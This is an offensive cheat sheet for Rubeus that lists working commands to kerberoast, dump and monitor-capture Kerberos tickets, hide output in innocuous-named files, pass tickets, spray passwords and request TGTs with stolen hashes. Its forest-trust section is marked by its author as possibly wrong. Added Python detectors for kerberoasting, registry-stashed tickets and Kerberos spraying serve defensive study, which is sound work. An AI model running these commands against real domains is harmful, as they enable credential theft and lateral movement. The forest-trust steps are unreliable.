
Rubeus.exe

Rubeus is wonderful for playing with hashes and Kerberos tickets.

Kerberoasting attack

rubeus.exe kerberoast /simple /outfile:kerberoast.txt
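From the blue-team side, the signal that command leaves on a domain controller is a burst of Security event 4769 (service ticket requested) entries for many distinct SPNs, typically with RC4 encryption (TicketEncryptionType 0x17), all from one account in a few seconds. The following detector is an added example and is not Rubeus code or the author's; it assumes the events have been exported as JSON lines with the standard 4769 field names, and the sample events are constructed.

```python
"""Detect a kerberoast burst in Windows Security 4769 events (added example)."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in JSON-lines form (not real logs). The field names
# follow the 4769 "A Kerberos service ticket was requested" schema:
# TargetUserName = account that asked, ServiceName = account owning the SPN,
# TicketEncryptionType 0x17 = RC4-HMAC (what a default kerberoast asks for),
# 0x12 = AES256. A ServiceName ending in '$' is a computer account.
SAMPLE_4769 = """
{"time":"2024-05-01T10:00:01","TargetUserName":"alice@DOMAIN.COM","ServiceName":"sql_svc","TicketEncryptionType":"0x17","IpAddress":"10.0.0.5"}
{"time":"2024-05-01T10:00:01","TargetUserName":"alice@DOMAIN.COM","ServiceName":"http_svc","TicketEncryptionType":"0x17","IpAddress":"10.0.0.5"}
{"time":"2024-05-01T10:00:02","TargetUserName":"alice@DOMAIN.COM","ServiceName":"backup_svc","TicketEncryptionType":"0x17","IpAddress":"10.0.0.5"}
{"time":"2024-05-01T10:00:02","TargetUserName":"alice@DOMAIN.COM","ServiceName":"iis_svc","TicketEncryptionType":"0x17","IpAddress":"10.0.0.5"}
{"time":"2024-05-01T10:00:03","TargetUserName":"alice@DOMAIN.COM","ServiceName":"exch_svc","TicketEncryptionType":"0x17","IpAddress":"10.0.0.5"}
{"time":"2024-05-01T10:00:03","TargetUserName":"alice@DOMAIN.COM","ServiceName":"WS01$","TicketEncryptionType":"0x12","IpAddress":"10.0.0.5"}
{"time":"2024-05-01T10:05:00","TargetUserName":"bob@DOMAIN.COM","ServiceName":"sql_svc","TicketEncryptionType":"0x12","IpAddress":"10.0.0.9"}
{"time":"2024-05-01T11:00:00","TargetUserName":"bob@DOMAIN.COM","ServiceName":"FS01$","TicketEncryptionType":"0x17","IpAddress":"10.0.0.9"}
"""


def parse_events(text):
    """Parse JSON-lines events; 'time' becomes a datetime so windows can be computed."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["time"] = datetime.fromisoformat(ev["time"])
        events.append(ev)
    return events


def detect_kerberoast(text, window=timedelta(minutes=5), min_services=4):
    """Return {requesting account: sorted SPN accounts} for every account that
    obtained RC4 service tickets for >= min_services distinct user-account SPNs
    inside one sliding window. AES tickets and computer-account services are
    skipped: they are the normal case, not the roastable one."""
    by_account = defaultdict(list)
    for ev in parse_events(text):
        if ev.get("TicketEncryptionType") != "0x17":
            continue
        if ev["ServiceName"].endswith("$"):
            continue
        by_account[ev["TargetUserName"]].append((ev["time"], ev["ServiceName"]))

    hits = {}
    for account, requests in by_account.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):
            in_window = {svc for t, svc in requests[i:] if t - start <= window}
            if len(in_window) >= min_services:
                hits[account] = sorted(in_window)
                break
    return hits


if __name__ == "__main__":
    for account, services in detect_kerberoast(SAMPLE_4769).items():
        print(f"possible kerberoast by {account}: {', '.join(services)}")
```

Tune `min_services` against your own baseline; a monitoring account that legitimately touches many SPNs will need an allowlist. The RC4 filter is the cheap, high-precision part, but an attacker can ask for AES tickets, so the count of distinct SPNs per account per window is the part worth keeping even if you drop the encryption-type check.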

Dump tickets

rubeus.exe dump /service:krbtgt /nowrap

Monitor mode

This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:

rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR

Monitor mode - save to disk

If for some reason the TGTs won't write to registry, try this to write to disk:

rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log

Extracting TGTs from registry hives after monitor mode attack

Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them.

Grab the TGTs from registry

reg export HKLM\SOFTWARE\MONITOR backup1.reg

Once you have the TGTs, use something like rubeus2ccache to convert to kirbi or ccache (reference). Then you can use rubeus to pass the TGT.
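The flip side of the two monitor-mode sections above and the reg export step: a responder on a host where this has been done wants to find tickets that were stashed in the registry. A base64 kirbi blob is an ASN.1 KRB-CRED, tagged APPLICATION 22 (first byte 0x76), which is why such blobs visibly start with "doI" once the DER length field is long-form. The scanner below is an added example, not Rubeus code or the author's; it assumes the .reg export has already been read into a string and that the tickets are stored as REG_SZ base64 strings. The key name comes from the page; the value names and the ticket bytes are constructed stand-ins, not a real ticket.

```python
"""Scan a .reg export for base64 KRB-CRED blobs stashed as string values (added example)."""
import base64
import binascii
import re

# Constructed stand-in for a kirbi blob: APPLICATION 22 tag (0x76) = KRB-CRED,
# long-form DER length 0x0500, filler content. It is NOT a real ticket.
_FAKE_INNER = b"\x30\x82\x04\xfc" + b"\x00" * 0x4fc
FAKE_KRB_CRED = b"\x76\x82\x05\x00" + _FAKE_INNER

# Constructed .reg export text. Key path taken from the page; value names made up.
SAMPLE_REG = f"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\MONITOR]
"ticket-0"="{base64.b64encode(FAKE_KRB_CRED).decode()}"
"note"="not a ticket at all"
"blob"=hex:01,02,03,04

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Vendor]
"Version"="1.0"
"""

KEY_RE = re.compile(r'^\[(.+)\]$')
VAL_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def der_length(buf):
    """Parse a DER length at buf[0]; return (length, bytes consumed) or None."""
    if not buf:
        return None
    first = buf[0]
    if first < 0x80:
        return first, 1
    n = first & 0x7F
    if n == 0 or n > 4 or len(buf) < 1 + n:
        return None
    return int.from_bytes(buf[1:1 + n], "big"), 1 + n


def looks_like_krb_cred(s):
    """True if s is base64 whose decoding is a complete APPLICATION 22 wrapper:
    right tag, and the DER length accounts for the whole blob (a truncated
    or mangled value fails this check)."""
    if not B64_RE.fullmatch(s) or len(s) % 4:
        return False
    try:
        raw = base64.b64decode(s, validate=True)
    except binascii.Error:
        return False
    if not raw or raw[0] != 0x76:
        return False
    parsed = der_length(raw[1:])
    if parsed is None:
        return False
    length, consumed = parsed
    return 1 + consumed + length == len(raw)


def find_stashed_tickets(reg_text):
    """Return [(key path, value name, decoded size)] for every REG_SZ value
    in the export that parses as a KRB-CRED blob. Binary (hex:) values and
    the default (@=) value are ignored."""
    hits = []
    key = None
    for line in reg_text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VAL_RE.match(line)
        if not m or key is None:
            continue
        name, data = m.groups()
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            value = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
            if looks_like_krb_cred(value):
                hits.append((key, name, len(base64.b64decode(value))))
    return hits


if __name__ == "__main__":
    for key, name, size in find_stashed_tickets(SAMPLE_REG):
        print(f"KRB-CRED in {key} value {name!r}: {size} bytes")
```

`reg export` writes UTF-16LE with a BOM, so read a real file with `open(path, encoding="utf-16")` before handing it to `find_stashed_tickets`. The same `looks_like_krb_cred` check works on any string source (a log file written by the `/consoleoutfile` variant, a pasted blob), since it only looks at the base64 and the outer ASN.1 wrapper.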

Pass-the-ticket

rubeus.exe ptt /ticket:xxx

Password spraying

rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt
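Because this sprays over Kerberos, the domain controller records one event 4771 (pre-authentication failed, Status 0x18) per account that rejected the password, all from one source address in a tight window, and a 4768 TGT success for any account where the password worked. The detector below is an added example and is not Rubeus code or the author's; it assumes 4771/4768 events exported as JSON lines with the standard field names, and the sample events are constructed.

```python
"""Detect Kerberos password spraying in 4771/4768 events (added example)."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). 4771 = Kerberos pre-authentication
# failed; Status 0x18 = KDC_ERR_PREAUTH_FAILED (wrong password, real account).
# 4768 = TGT requested; Status 0x0 = success. IpAddress carries the
# IPv4-mapped IPv6 prefix the real log uses.
SAMPLE_KRB = """
{"time":"2024-05-01T09:00:00","EventID":4771,"TargetUserName":"alice","Status":"0x18","IpAddress":"::ffff:10.0.0.7"}
{"time":"2024-05-01T09:00:00","EventID":4771,"TargetUserName":"bob","Status":"0x18","IpAddress":"::ffff:10.0.0.7"}
{"time":"2024-05-01T09:00:01","EventID":4771,"TargetUserName":"carol","Status":"0x18","IpAddress":"::ffff:10.0.0.7"}
{"time":"2024-05-01T09:00:01","EventID":4771,"TargetUserName":"dave","Status":"0x18","IpAddress":"::ffff:10.0.0.7"}
{"time":"2024-05-01T09:00:02","EventID":4771,"TargetUserName":"erin","Status":"0x18","IpAddress":"::ffff:10.0.0.7"}
{"time":"2024-05-01T09:00:02","EventID":4771,"TargetUserName":"frank","Status":"0x18","IpAddress":"::ffff:10.0.0.7"}
{"time":"2024-05-01T09:00:03","EventID":4768,"TargetUserName":"grace","Status":"0x0","IpAddress":"::ffff:10.0.0.7"}
{"time":"2024-05-01T09:30:00","EventID":4771,"TargetUserName":"heidi","Status":"0x18","IpAddress":"::ffff:10.0.0.20"}
{"time":"2024-05-01T09:30:05","EventID":4768,"TargetUserName":"heidi","Status":"0x0","IpAddress":"::ffff:10.0.0.20"}
"""


def parse_events(text):
    """Parse JSON-lines events; normalise time and strip the ::ffff: prefix."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["time"] = datetime.fromisoformat(ev["time"])
        ip = ev["IpAddress"]
        ev["ip"] = ip[7:] if ip.startswith("::ffff:") else ip
        events.append(ev)
    return events


def detect_spray(text, window=timedelta(minutes=1), min_accounts=5):
    """Return {source ip: {"failed": [...], "hits": [...]}} for sources that
    produced pre-auth failures on >= min_accounts distinct accounts inside one
    sliding window. "hits" are accounts that received a TGT from the same
    source between the start of the burst and one window after its last
    failure, i.e. the accounts where the sprayed password worked."""
    events = sorted(parse_events(text), key=lambda e: e["time"])
    fails, successes = defaultdict(list), defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4771 and ev["Status"] == "0x18":
            fails[ev["ip"]].append((ev["time"], ev["TargetUserName"]))
        elif ev["EventID"] == 4768 and ev["Status"] == "0x0":
            successes[ev["ip"]].append((ev["time"], ev["TargetUserName"]))

    result = {}
    for ip, fl in fails.items():
        for i, (start, _) in enumerate(fl):
            burst = [(t, u) for t, u in fl[i:] if t - start <= window]
            names = {u for _, u in burst}
            if len(names) < min_accounts:
                continue
            end = burst[-1][0] + window
            hits = sorted({u for t, u in successes[ip] if start <= t <= end})
            result[ip] = {"failed": sorted(names), "hits": hits}
            break
    return result


if __name__ == "__main__":
    for ip, info in detect_spray(SAMPLE_KRB).items():
        print(f"spray from {ip}: {len(info['failed'])} accounts failed, hits={info['hits']}")
```

A single user mistyping a password (heidi above) never trips the distinct-account threshold, which is the point of keying on accounts per source rather than failures per account. Accounts listed under `hits` are the ones to reset first, since the sprayer's output file is exactly that list.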

Request a TGT

rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap

Note: when running asktgt for a domain controller's machine account, be sure to include the trailing dollar sign, e.g. DC01$

Request a TGT when abusing forest trusts [ UNDER REVIEW ]

danger

I was working on this in a lab and don't think this section below is right, so ignore it until further review.

If you're in a situation where you've got DA on DOMAIN2.COM and want to abuse that to pwn DOMAIN1.COM, and you've extracted domain SIDs with get-adobject and you've extracted trust keys with mimikatz, you can do something like this to request a TGT for the pwned domain:

rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ /nowrap

Describe a ticket

rubeus.exe describe /ticket:base64ticket

This came in really handy during an engagement where I had lifted a TGT from a system and was trying to pass it and use it, and was getting all sorts of errors. When I ran the describe command, the output said KeyType=180, which I learned means Credential Guard is in place and that the ticket won't work anywhere but the box it came from!